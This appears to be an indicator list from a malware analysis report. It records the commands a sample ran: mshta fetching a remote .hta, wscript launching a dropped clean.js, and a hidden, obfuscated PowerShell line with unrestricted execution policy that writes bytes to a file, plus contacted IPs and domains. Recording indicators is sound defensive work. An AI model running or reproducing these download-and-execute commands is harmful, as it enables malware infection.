Technical Information
- '<SYSTEM32>\mshta.exe' http://40.##.123.35/clean.hta
- '<SYSTEM32>\wscript.exe' "%APPDATA%\clean.js"
- %APPDATA%\clean.js
- %APPDATA%\clean.js
- '40.##.123.35':80
- 'i.##b.co':443
- http://40.##.123.35/clean.hta
- http://40.##.123.35/clean.js
- 'i.##b.co':443
- DNS ASK i.##b.co
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy UnRestricted function QbrXupmzNqze($IftOUJswPoY, $aPZMBlwSgNqz){[IO.File]::WriteAllBytes($IftOUJswPoY, $aPZMBlwSgNqz)};function HqKBtlWQrbULFS($IftOUJswPoY){if($IftOUJswPoY.End...' (with hidden window)